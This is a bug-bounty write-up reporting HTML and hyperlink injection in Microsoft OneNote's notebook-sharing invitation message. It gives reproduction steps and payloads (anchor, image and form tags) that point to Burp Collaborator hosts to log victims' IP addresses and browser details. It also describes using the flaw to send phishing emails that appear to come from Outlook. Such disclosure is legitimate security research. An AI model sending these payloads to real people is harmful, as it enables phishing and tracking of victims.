HTML and Hyperlink Injection via Share Option In Microsoft Onenote Application
2022-6-29 18:3:19 Author: infosecwriteups.com(查看原文) 阅读量:15 收藏

Hyperlink Injection it’s when attacker injecting a malicious link when sending an email invitation. HTML injection attack is injecting HTML code through the vulnerable parts of the website. The Malicious user sends HTML code through any vulnerable field with a purpose to change the website’s design or any information, that is displayed to the user. It is possible to inject html code in the message filed, which can be used to redirect user to malicious website and also causes change of website content via tag.

  • Hyperlink injection in the email can lead to phishing via email directly to users.
  • Attacker can share one with fake titles like “You have won 1000 RS. Click to claim”.
  • And in the mail, itself due to HTML injection, it is possible to inject HTML code and make the URL Hyperlink. Which can be further added to make fake emails.
  • In the mail header itself shows via outlook.com, which makes the email genuine.
  • Only thing attacker need is a email and in case of company (organization email) this can be used bypass the phishing protections.
    HTML injection in the using tag for href attribute can be used for redirecting user to fake IP or redirect traffic to any IP , which can further redirect the traffic to domain .
  • Fake links can be used for collecting user information such as IP address and browser info via user agent and location. By putting tags it can lead to partial defacement by changing the font size and look.
  • Only thing attacker need is a email and in case of company (organisation email) this can be used bypass the phishing protections.
  • Create New Notebook and login via [email protected] user.
  • Click on share in the right corner. In the `Sharing Options > Invite People to Notebook.

  • Then Type Email and Include Message.
  • In the include message enter any of the below mentioned payload:

1) HTML <a> Tag: <a href=”https://burpcollaboratorlink.burpcollaborator.net"> Click to win</a>

2) Image Tag: <img src=”https://burpcollaboratorlink.burpcollaborator.net">

3) HTML FORM:

< html>
< body>
< h2 >HTML Forms< /h2 >
< form action="burp-coolaborator.burpcollaborator.net">
< label for="fname">First name:< /label>< br>
< input type="text" id="fname" name="fname" value="John">< br>
< label for="lname">Last name:< /label>< br>
< input type="text" id="lname" name="lname" value="Doe">< br>< br>
< input type="submit" value="Submit">
< /form>
< p>Click to win< /p>
< /body>
< /html>

HTML Form
  • Share it with the victims.
  • Check the phishing email on outlook.

Outlook <a> tag

Outlook phishing email
  • Check the email on gmail.

Gmail phishing email
  • Once victim will click on the link it will be redirected to malicious website.

Burp collaborator IP callback of victim
  • HTML injection in the using tag for href attribute can be used for redirecting user to fake IP or redirect traffic to any IP , which can further redirect the traffic to domain .
  • Fake links can be used for collecting user information such as IP address and browser info via user agent and location.

Once the issue was fixed it was marked as out of scope by the MSRC program.

From Infosec Writeups: A lot is coming up in the Infosec every day that it’s hard to keep up with. Join our weekly newsletter to get all the latest Infosec trends in the form of 5 articles, 4 Threads, 3 videos, 2 Github Repos and tools, and 1 job alert for FREE! https://weekly.infosecwriteups.com/


文章来源: https://infosecwriteups.com/html-and-hyperlink-injection-via-share-option-in-microsoft-onenote-application-47e94d0e6478?source=rss----7b722bfd1b8d--bug_bounty
如有侵权请联系:admin#unsafe.sh